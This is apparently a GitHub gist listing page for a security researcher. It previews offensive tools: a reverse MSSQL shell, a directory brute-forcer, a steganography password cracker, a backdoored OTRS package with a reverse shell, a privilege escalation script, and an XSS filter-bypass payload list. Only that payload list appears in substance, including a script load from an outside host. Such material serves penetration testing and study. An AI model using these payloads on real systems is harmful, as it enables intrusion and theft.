ReK2 r3k2
View NeoMutt colorschemes
# for background in 16 color terminal, valid background colors include:
# base03, bg, black, any of the non brights
# style notes:
# when bg=235, that's a highlighted message
# normal bg=233
# basic colors ---------------------------------------------------------
# color normal brightyellow default
color error color196 color235 # message line error text
r3k2 / mandros.py
Created Jun 5, 2018 — forked from xassiz/mandros.py
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
r3k2 / SuperGoBuster.sh
Last active Jun 9, 2018
SuperGoBuster
View SuperGoBuster.sh
#!/bin/bash
set -eu
URL=$1
SECLIST="${HOME}/herramientas/diccionarios/SecLists/Discovery/Web_Content"
MIDDIR="/usr/share/dirbuster/directory-list-2.3-medium.txt"
declare -a FILES=("tomcat.txt" "nginx.txt" "apache.txt" "Top1000-RobotsDisallowed.txt" "ApacheTomcat.fuzz.txt" "sharepoint.txt" "iis.txt")
EXTENSIONS=("txt,php,doc,docx")
GOB="/bin/gobuster"
OUTPUT="${URL}-results"
View gist:1f6f4afc2de1006de4e56e6e9a7d4b20
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
View keybase.md

Keybase proof

I hereby claim:

  • I am rek2fernandez on github.
  • I am cfernandez (https://keybase.io/cfernandez) on keybase.
  • I have a public key ASDB2t5UcZyFOJ7JllgzK85TEJfktBx0ibpsCrPs6aacGQo

To claim this, I am signing this object:

r3k2 / StegBrute.rb
Last active Nov 22, 2017
Brute force steganography passwords
View StegBrute.rb
#!/usr/bin/env ruby
# Hispgatos
# by ReK2, Fernandez Chris
# https://keybase.io/cfernandez
# Bruteforce password protected documents hidden inside images
# add your dictionary below to the dic variable
# of course you need to have installed steghide
require 'open3'
r3k2 / xxsfilterbypass.lst
Last active Nov 15, 2017 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
View how-to-oscp-final.md

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Run unicornscan from the CLI, and run nmap from inside msfconsole so its results are stored in the database as loot.

r3k2 / MyPackage.opm
Created Sep 27, 2017 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
View MyPackage.opm
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
r3k2 / LinuxPrivEsc.sh
Created Aug 24, 2017 — forked from 1N3/LinuxPrivEsc.sh
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
View LinuxPrivEsc.sh
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'